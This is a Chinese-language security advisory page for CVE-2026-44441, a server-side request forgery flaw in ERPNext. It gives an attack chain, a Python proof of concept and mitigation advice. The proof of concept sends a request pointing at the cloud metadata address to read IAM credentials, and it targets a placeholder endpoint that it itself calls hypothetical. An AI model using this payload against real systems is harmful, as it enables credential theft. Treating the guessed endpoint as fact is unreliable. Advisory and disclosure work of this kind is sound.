IPBUF安全漏洞报告
English
CVE-2026-44441 CVSS 5.0 中危

CVE-2026-44441: ERPNext 服务端请求伪造漏洞

披露日期: 2026-05-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-44441
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
5.0 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
ERPNext

相关标签

SSRFERPNextCVE-2026-44441服务端请求伪造中危

漏洞概述

ERPNext是一款免费的开源企业资源规划工具。在15.106.0版本和16.16.0版本之前,该系统存在一个服务端请求伪造(SSRF)漏洞。由于对用户输入请求的验证不够严格,拥有低权限的恶意用户可以向特定的API端点发送精心构造的恶意请求。这将导致服务器在处理该请求时,被迫向攻击者指定的任意服务发起HTTP调用。攻击者可利用此漏洞探测内网服务、读取本地元数据,对系统的机密性构成威胁。

技术细节

该漏洞的根源在于ERPNext服务器端未能对用户提供的URL参数或特定请求体进行充分的安全校验和过滤。攻击者利用低权限账号登录系统后,可以构造包含恶意目标URL的HTTP请求,并将其发送至存在漏洞的API端点。当服务器端应用程序处理该请求时,会直接解析用户输入的参数,并将其作为目标地址发起后端HTTP调用。由于缺乏对内网IP地址(如127.0.0.1、10.0.0.0/8、172.16.0.0/12、192.168.0.0/16)或敏感端口的有效限制,攻击者可以利用此漏洞对内网基础设施进行端口扫描、访问未授权的内部管理面板、读取云实例元数据(如AWS IAM凭证),甚至结合其他漏洞进行更深层次的内网渗透。

攻击链分析

STEP 1
1. 信息收集与访问
攻击者获取一个ERPNext系统的低权限用户账号,并登录系统。
STEP 2
2. 构造恶意请求
攻击者识别出存在漏洞的API端点,并构造包含恶意目标URL(如内网地址或云元数据地址)的请求数据。
STEP 3
3. 发起SSRF攻击
攻击者向服务器发送该恶意请求,服务器端代码解析参数并代为向攻击者指定的目标发起HTTP请求。
STEP 4
4. 获取敏感信息
攻击者根据服务器的响应,获取内网服务的Banner信息、敏感文件内容或云平台凭证。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Vulnerable endpoint) target_url = "http://erpnext-target.com/api/vulnerable_endpoint" # Malicious internal URL to access metadata (SSRF payload) # Attacker aims to read cloud metadata or scan internal ports malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Payload structure (Hypothetical based on typical SSRF) payload = { "url": malicious_url, "param1": "value1" } # Sending the request headers = { "Authorization": "Bearer <low_priv_token>", "Content-Type": "application/json" } try: response = requests.post(target_url, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] SSRF Successful! Response received:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

ERPNext < 15.106.0
ERPNext < 16.16.0

防御指南

临时缓解措施
建议立即将ERPNext升级至修复版本。在无法立即升级的情况下,应在防火墙或应用网关层面严格限制服务器对内部网络(如127.0.0.1、169.254.169.254等)及非业务必要的外部地址发起HTTP请求,并密切监控异常出站流量。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表